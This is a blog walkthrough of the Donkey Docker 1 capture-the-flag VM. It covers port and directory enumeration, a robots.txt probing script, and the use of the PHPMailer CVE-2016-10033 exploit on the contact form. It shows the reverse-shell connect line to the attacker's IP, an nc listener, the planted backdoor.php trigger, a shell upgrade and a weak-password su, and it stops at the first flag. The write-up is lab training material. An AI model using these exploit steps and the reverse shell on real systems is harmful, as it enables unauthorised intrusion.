Thursday, June 28, 2018

The Donkey Docker 1, Capture The Flag (CTF) | By Hud Seidu Daannaa

Welcome to
  ___           _            ___          _
 |   \ ___ _ _ | |_____ _  _|   \ ___  __| |_____ _ _
 | |) / _ \ ' \| / / -_) || | |) / _ \/ _| / / -_) '_|
 |___/\___/_||_|_\_\___|\_, |___/\___/\__|_\_\___|_|
                        |__/
                             Made with <3 v.1.0 - 2017
This is my first boot2root - CTF VM. I hope you enjoy it. If you run into any issue you can find me on Twitter: @dhn_ or feel free to write me a mail to:
  • Email: dhn@zer0-day.pw
  • GPG key: 0x2641123C
  • GPG fingerprint: 4E3444A11BB780F84B58E8ABA8DD99472641123C
Level: I think the level of this boot2root challenge is hard or intermediate.
Try harder!: If you are confused or frustrated don't forget that enumeration is the key!
Thanks: Special thanks to @1nternaut for the awesome CTF VM name!
Feedback: This is my first boot2root - CTF VM, please give me feedback on how to improve!
Tested: This VM was tested with:
  • VMware Workstation 12 Pro
  • VMware Workstation 12 Player
  • VMware vSphere Hypervisor (ESXi) 6.5
Networking: DHCP service: Enabled
IP address: Automatically assign

SHA-1:

77439cb457a03d554bec78303dc42e5d3074ff85  DonkeyDocker-disk1.vmdk
d3193cca484f7f1b36c20116f49e9025bf60889c  DonkeyDocker.mf
7013d6a7c151332c99c0e96d34b812e0e7ce3d57  DonkeyDocker.ovf

Walkthrough
The Donkey Docker 1 

________________________________________________________________

Host Discovery
________________________________________________________________

netdiscover -r 192.168.100.0/24
[+] Target IP address: 192.168.100.15

________________________________________________________________

Service Enumeration
________________________________________________________________

nmap -T4 -A 192.168.100.15
   PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
    | ssh-hostkey:
    |   2048 9c:38:ce:11:9c:b2:7a:48:58:c9:76:d5:b8:bd:bd:57 (RSA)
    |_  256 d7:5e:f2:17:bd:18:1b:9c:8c:ab:11:09:e8:a0:00:c2 (ECDSA)
    80/tcp open  http    Apache httpd 2.4.10 ((Debian))
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    | http-robots.txt: 3 disallowed entries
    |_/contact.php /index.php /about.php
    |_http-server-header: Apache/2.4.10 (Debian)
    |_http-title: Docker Donkey

[+] From the nmap scan above, the http-robots.txt script reports three disallowed entries in robots.txt:

/contact.php
/index.php
/about.php
________________________________________________________________

Bruteforcing files and directories to enumerate further
________________________________________________________________

dirb http://192.168.100.15/
/about
/contact                      A contact form
/index
/robots.txt
/mailer/LICENSE               GNU GPL text
/mailer/examples/index.html   PHPMailer code examples
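As an added example that is not part of the original walkthrough (and not code from nmap or dirb), the following Python pulls the Disallow entries out of robots.txt and probes each path for a status code, trying both the listed name and the extension-less form because dirb found /contact as well as /contact.php. The sample robots.txt is constructed here from the three entries nmap reported, and the base URL is the target found above.

```python
"""robots.txt parsing and path probing for the enumeration step.

Added example for this walkthrough, not part of the original page.
SAMPLE_ROBOTS is constructed from the three Disallow entries nmap reported.
"""
import urllib.error
import urllib.parse
import urllib.request

SAMPLE_ROBOTS = """\
# constructed sample, mirrors what nmap's http-robots.txt script reported
User-agent: *
Disallow: /contact.php
Disallow: /index.php
Disallow: /about.php
Disallow:            # an empty Disallow allows everything; nothing to probe
"""


def fetch_robots(base, timeout=5):
    """Download /robots.txt from the target (network call, not used in tests)."""
    url = urllib.parse.urljoin(base, "/robots.txt")
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def disallowed_paths(robots_txt):
    """Return Disallow paths in order, skipping comments, blanks and duplicates."""
    paths = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop trailing comments
        if not line.lower().startswith("disallow:"):
            continue
        value = line.split(":", 1)[1].strip()
        if value and value not in paths:            # empty value = allow all
            paths.append(value)
    return paths


def variants(path):
    """dirb found /contact next to /contact.php, so try both spellings."""
    out = [path]
    if path.endswith(".php"):
        out.append(path[:-4])
    return out


def probe(base, paths, timeout=5):
    """HEAD each candidate; map path -> HTTP status (None if unreachable)."""
    results = {}
    for p in paths:
        for cand in variants(p):
            url = urllib.parse.urljoin(base, cand)
            req = urllib.request.Request(url, method="HEAD")
            try:
                with urllib.request.urlopen(req, timeout=timeout) as resp:
                    results[cand] = resp.getcode()
            except urllib.error.HTTPError as e:     # 4xx/5xx still carry a code
                results[cand] = e.code
            except urllib.error.URLError:           # refused, DNS, timeout
                results[cand] = None
    return results


if __name__ == "__main__":
    base = "http://192.168.100.15/"
    robots = fetch_robots(base)                     # or SAMPLE_ROBOTS offline
    for path, status in probe(base, disallowed_paths(robots)).items():
        print(status, path)
```

Run offline by swapping `fetch_robots(base)` for `SAMPLE_ROBOTS`; against the VM it lists the status of every robots.txt entry plus its extension-less twin, which is the same signal dirb gave above.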
________________________________________________________________

Time to pinpoint the exploit
________________________________________________________________

[+] The /mailer/examples/ directory identifies the mail component as PHPMailer.
[+] To find a matching exploit I ran searchsploit through my automation script, which is available on
[+] GitHub:
https://github.com/huddryl/HudsPenetrationTestAutomationTweakScript_-HPTATS-

[+] The result is:

PHPMailer < 5.2.18 - Remote Code Execution (Python), located at:
php/webapps/40974.py

[+] The same exploit is available from Exploit-DB:
https://www.exploit-db.com/exploits/40974/
[+] Its header gives the description and usage:
..............................................................................................................................................................................
..............................................................................................................................................................................
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033

Description:
Exploiting PHPMailer with back connection (reverse shell) from the target

Usage:
1 - Download docker vulnerable environment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
3 - Open nc listener in one terminal: $ nc -lnvp <your ip>
4 - Open other terminal and run the exploit: python3 anarcoder.py

Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU

Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
..............................................................................................................................................................................
..............................................................................................................................................................................

________________________________________________________________

Configuring & Launching the exploit
________________________________________________________________


[+] Setting the parameters for the exploit:
[+] In the exploit code the defaults are:

target = 'http://localhost:8080'
backdoor = '/backdoor.php'

[+] We replace target with the URL of the contact form, since that is the page that hands our
[+] input to PHPMailer:

target = 'http://192.168.100.15/contact'

[+] The reverse-shell payload variable must also be pointed at the attacker's IP and port. The
[+] connect call sits inside a PHP single-quoted string, so the quotes stay escaped exactly as in
[+] the original:

s.connect((\\\'192.168.100.12\\\',4444))

[+] Open a listener on the attacker machine. The exploit's usage text says nc -lnvp <your ip>, but
[+] nc -l takes the port to listen on, not an IP, so on my PC (attacker) it is simply:

nc -lvp 4444

[+] With the parameters set, run the exploit (it depends on the requests and requests_toolbelt
[+] packages, so install those first):

python 40974.py

________________________________________________________________

Access

________________________________________________________________

[+] The exploit writes backdoor.php into the web root on the victim. The file lands at the site root
[+] regardless of the contact-form URL we used as target, so we trigger it by requesting:

http://192.168.100.15/backdoor.php

[+] The listener terminal now receives the reverse shell. To upgrade it to an interactive TTY, run:

python -c 'import pty; pty.spawn("/bin/bash")'


[+] Running ls -al and looking through the files and directories, we find a bash script named main.sh
[+] in /. Viewing it with cat /main.sh shows:

    #!/bin/bash

    # change permission
    chown smith:users /home/smith/flag.txt

    # Start apache
    source /etc/apache2/envvars
    a2enmod rewrite
    apachectl -f /etc/apache2/apache2.conf

    sleep 3
    tail -f /var/log/apache2/*&

    # Start our fake SMTP server
    python -m smtpd -n -c DebuggingServer localhost:25


[+] main.sh (mode -rwxr-xr-x) chowns the flag to a user named smith, so that account exists inside
[+] the container. Trying the username as the password works:

su smith        # password: smith

[+] Running id confirms the new user:
 
uid=1000(smith) gid=100(users) groups=100(users)

[+] we proceed to view /home/smith/flag.txt

cat /home/smith/flag.txt

This is not the end, sorry dude. Look deeper!
I know nobody created a user into a docker
container but who cares? ;-)

But good work!
Here a flag for you: flag0{9fe3ed7d67635868567e290c6a490f8e}

PS: I like 1984 written by George ORWELL
inside .ssh there is a key
